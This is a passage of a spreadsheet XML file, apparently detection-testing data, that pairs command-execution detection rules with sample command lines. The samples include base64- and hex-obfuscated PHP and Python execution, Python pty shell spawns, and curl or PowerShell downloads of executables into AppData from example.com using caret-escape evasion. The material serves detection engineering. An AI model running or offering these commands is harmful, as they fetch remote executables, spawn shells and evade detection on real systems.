          <t>php.exe -r "eval(base64_decode('c3lzdGVtKCd3aG9hbWknKTs='));"</t>
        </is>
      </c>
      <c r="F3679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3679" s="43" t="n"/>
      <c r="J3679" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3679" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3680" ht="15.75" customHeight="1" s="42">
      <c r="A3680" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3680" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3680" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3680" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3680" s="43" t="inlineStr">
        <is>
          <t>php.exe -r "\x73\x79\x73\x74\x65\x6d\x28\x27\x77\x68\x6f\x61\x6d\x69\x27\x29\x3b</t>
        </is>
      </c>
      <c r="F3680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3680" s="43" t="n"/>
      <c r="J3680" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3680" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3681" ht="15.75" customHeight="1" s="42">
      <c r="A3681" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3681" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C3681" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D3681" s="43" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E3681" s="43" t="inlineStr">
        <is>
          <t>powershell.exe - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F3681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3681" s="43" t="n"/>
      <c r="J3681" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3681" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3682" ht="15.75" customHeight="1" s="42">
      <c r="A3682" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3682" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C3682" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D3682" s="43" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E3682" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F3682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3682" s="43" t="n"/>
      <c r="J3682" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3682" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3683" ht="15.75" customHeight="1" s="42">
      <c r="A3683" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3683" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C3683" s="43" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D3683" s="43" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E3683" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe -u System cmd.exe</t>
        </is>
      </c>
      <c r="F3683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3683" s="43" t="n"/>
      <c r="J3683" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3683" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3684" ht="15.75" customHeight="1" s="42">
      <c r="A3684" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3684" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C3684" s="43" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D3684" s="43" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E3684" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe --ti cmd.exe</t>
        </is>
      </c>
      <c r="F3684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3684" s="43" t="n"/>
      <c r="J3684" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3684" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3685" ht="15.75" customHeight="1" s="42">
      <c r="A3685" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3685" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_inline_command_execution</t>
        </is>
      </c>
      <c r="C3685" s="43" t="inlineStr">
        <is>
          <t>Python Inline Command Execution</t>
        </is>
      </c>
      <c r="D3685" s="43" t="inlineStr">
        <is>
          <t>899133d5-4d7c-4a7f-94ee-27355c879d90</t>
        </is>
      </c>
      <c r="E3685" s="43" t="inlineStr">
        <is>
          <t>python.exe -c'import os; os.system("whoami")'</t>
        </is>
      </c>
      <c r="F3685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3685" s="43" t="n"/>
      <c r="J3685" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3685" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3686" ht="15.75" customHeight="1" s="42">
      <c r="A3686" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3686" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_inline_command_execution</t>
        </is>
      </c>
      <c r="C3686" s="43" t="inlineStr">
        <is>
          <t>Python Inline Command Execution</t>
        </is>
      </c>
      <c r="D3686" s="43" t="inlineStr">
        <is>
          <t>899133d5-4d7c-4a7f-94ee-27355c879d90</t>
        </is>
      </c>
      <c r="E3686" s="43" t="inlineStr">
        <is>
          <t>python.exe -c"import os; os.system('whoami')"</t>
        </is>
      </c>
      <c r="F3686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3686" s="43" t="n"/>
      <c r="J3686" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3686" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3687" ht="15.75" customHeight="1" s="42">
      <c r="A3687" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3687" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_inline_command_execution</t>
        </is>
      </c>
      <c r="C3687" s="43" t="inlineStr">
        <is>
          <t>Python Inline Command Execution</t>
        </is>
      </c>
      <c r="D3687" s="43" t="inlineStr">
        <is>
          <t>899133d5-4d7c-4a7f-94ee-27355c879d90</t>
        </is>
      </c>
      <c r="E3687" s="43" t="inlineStr">
        <is>
          <t>python.exe -c "import os; os.system('whoami')" # test comment</t>
        </is>
      </c>
      <c r="F3687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3687" s="43" t="n"/>
      <c r="J3687" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3687" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3688" ht="15.75" customHeight="1" s="42">
      <c r="A3688" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3688" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_inline_command_execution</t>
        </is>
      </c>
      <c r="C3688" s="43" t="inlineStr">
        <is>
          <t>Python Inline Command Execution</t>
        </is>
      </c>
      <c r="D3688" s="43" t="inlineStr">
        <is>
          <t>899133d5-4d7c-4a7f-94ee-27355c879d90</t>
        </is>
      </c>
      <c r="E3688" s="43" t="inlineStr">
        <is>
          <t>python.exe -c "import os; os.system('whoami')"\n</t>
        </is>
      </c>
      <c r="F3688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3688" s="43" t="n"/>
      <c r="J3688" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3688" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3689" ht="15.75" customHeight="1" s="42">
      <c r="A3689" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3689" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_inline_command_execution</t>
        </is>
      </c>
      <c r="C3689" s="43" t="inlineStr">
        <is>
          <t>Python Inline Command Execution</t>
        </is>
      </c>
      <c r="D3689" s="43" t="inlineStr">
        <is>
          <t>899133d5-4d7c-4a7f-94ee-27355c879d90</t>
        </is>
      </c>
      <c r="E3689" s="43" t="inlineStr">
        <is>
          <t>python.exe -c "import os; os.system('whoami')"\x20</t>
        </is>
      </c>
      <c r="F3689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3689" s="43" t="n"/>
      <c r="J3689" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3689" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3690" ht="15.75" customHeight="1" s="42">
      <c r="A3690" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3690" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C3690" s="43" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D3690" s="43" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E3690" s="43" t="inlineStr">
        <is>
          <t>py.exe -c "import pty; pty.spawn( '\"/bin/sh\"' )"</t>
        </is>
      </c>
      <c r="F3690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3690" s="43" t="n"/>
      <c r="J3690" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3690" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3691" ht="15.75" customHeight="1" s="42">
      <c r="A3691" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3691" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C3691" s="43" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D3691" s="43" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E3691" s="43" t="inlineStr">
        <is>
          <t>python.exe -c "exec(import('base64').b64decode('aW1wb3J0IHB0eTsgcHR5LnNwYXZuKCIvYmluL3NoIik='))"</t>
        </is>
      </c>
      <c r="F3691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3691" s="43" t="n"/>
      <c r="J3691" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3691" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3692" ht="15.75" customHeight="1" s="42">
      <c r="A3692" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3692" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C3692" s="43" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D3692" s="43" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E3692" s="43" t="inlineStr">
        <is>
          <t>python.exe -c "import pty; pty. spawn('/bin/sh')"</t>
        </is>
      </c>
      <c r="F3692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3692" s="43" t="n"/>
      <c r="J3692" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3692" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3693" ht="15.75" customHeight="1" s="42">
      <c r="A3693" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3693" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C3693" s="43" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D3693" s="43" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E3693" s="43" t="inlineStr">
        <is>
          <t>pc_renamed.exe --scanner aclcheck --healthcheck --level Full --no-enum-limit --server localhost</t>
        </is>
      </c>
      <c r="F3693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3693" s="43" t="n"/>
      <c r="J3693" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3693" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3694" ht="15.75" customHeight="1" s="42">
      <c r="A3694" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3694" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C3694" s="43" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D3694" s="43" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E3694" s="43" t="inlineStr">
        <is>
          <t>PingCastle.exe --scanner aclcheck --healthcheck --level Full --no-enum-limit --server localhost</t>
        </is>
      </c>
      <c r="F3694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3694" s="43" t="n"/>
      <c r="J3694" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3694" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3695" ht="15.75" customHeight="1" s="42">
      <c r="A3695" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3695" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ruby_inline_command_execution</t>
        </is>
      </c>
      <c r="C3695" s="43" t="inlineStr">
        <is>
          <t>Ruby Inline Command Execution</t>
        </is>
      </c>
      <c r="D3695" s="43" t="inlineStr">
        <is>
          <t>20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8</t>
        </is>
      </c>
      <c r="E3695" s="43" t="inlineStr">
        <is>
          <t>ruby.exe -e puts\ "Test Execution"</t>
        </is>
      </c>
      <c r="F3695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3695" s="43" t="n"/>
      <c r="J3695" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3695" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3696" ht="15.75" customHeight="1" s="42">
      <c r="A3696" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3696" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ruby_inline_command_execution</t>
        </is>
      </c>
      <c r="C3696" s="43" t="inlineStr">
        <is>
          <t>Ruby Inline Command Execution</t>
        </is>
      </c>
      <c r="D3696" s="43" t="inlineStr">
        <is>
          <t>20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8</t>
        </is>
      </c>
      <c r="E3696" s="43" t="inlineStr">
        <is>
          <t>ruby.exe -e"puts 'Test Execution'"</t>
        </is>
      </c>
      <c r="F3696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3696" s="43" t="n"/>
      <c r="J3696" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3696" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3697" ht="15.75" customHeight="1" s="42">
      <c r="A3697" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3697" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ruby_inline_command_execution</t>
        </is>
      </c>
      <c r="C3697" s="43" t="inlineStr">
        <is>
          <t>Ruby Inline Command Execution</t>
        </is>
      </c>
      <c r="D3697" s="43" t="inlineStr">
        <is>
          <t>20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8</t>
        </is>
      </c>
      <c r="E3697" s="43" t="inlineStr">
        <is>
          <t>ruby.exe -e puts\'Test Execution\'</t>
        </is>
      </c>
      <c r="F3697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3697" s="43" t="n"/>
      <c r="J3697" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3697" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3698" ht="15.75" customHeight="1" s="42">
      <c r="A3698" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3698" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ruby_inline_command_execution</t>
        </is>
      </c>
      <c r="C3698" s="43" t="inlineStr">
        <is>
          <t>Ruby Inline Command Execution</t>
        </is>
      </c>
      <c r="D3698" s="43" t="inlineStr">
        <is>
          <t>20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8</t>
        </is>
      </c>
      <c r="E3698" s="43" t="inlineStr">
        <is>
          <t>ruby.exe -e puts 'Test Execution'</t>
        </is>
      </c>
      <c r="F3698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3698" s="43" t="n"/>
      <c r="J3698" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3698" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3699" ht="15.75" customHeight="1" s="42">
      <c r="A3699" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3699" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3699" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3699" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3699" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o "%AppData%\test.exe" http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F3699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3699" s="43" t="n"/>
      <c r="J3699" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3699" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3700" ht="15.75" customHeight="1" s="42">
      <c r="A3700" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3700" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3700" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3700" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3700" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %AppData%\test.exe h^t^t^p^:^/^/example.com/test.exe"</t>
        </is>
      </c>
      <c r="F3700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3700" s="43" t="n"/>
      <c r="J3700" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3700" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3701" ht="15.75" customHeight="1" s="42">
      <c r="A3701" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3701" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3701" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3701" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3701" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o "%AP^PDATA%\test.exe" http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F3701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3701" s="43" t="n"/>
      <c r="J3701" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3701" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3702" ht="15.75" customHeight="1" s="42">
      <c r="A3702" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3702" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3702" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3702" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3702" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o "%USERPROFILE%\AppData\Roaming\test.exe" http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F3702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3702" s="43" t="n"/>
      <c r="J3702" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3702" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3703" ht="15.75" customHeight="1" s="42">
      <c r="A3703" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3703" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3703" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3703" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3703" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o test.exe http://example.com/test.exe"</t>
        </is>
      </c>
      <c r="F3703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3703" s="43" t="n"/>
      <c r="J3703" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3703" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3704" ht="15.75" customHeight="1" s="42">
      <c r="A3704" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3704" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3704" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3704" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3704" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F3704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3704" s="43" t="n"/>
      <c r="J3704" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3704" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3705" ht="15.75" customHeight="1" s="42">
      <c r="A3705" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3705" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3705" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3705" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3705" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^pexample.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F3705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3705" s="43" t="n"/>
      <c r="J3705" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3705" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3706" ht="15.75" customHeight="1" s="42">
      <c r="A3706" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3706" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3706" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3706" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3706" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F3706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3706" s="43" t="n"/>
      <c r="J3706" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3706" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3707" ht="15.75" customHeight="1" s="42">
      <c r="A3707" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3707" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3707" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3707" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3707" s="43" t="inlineStr">
        <is>
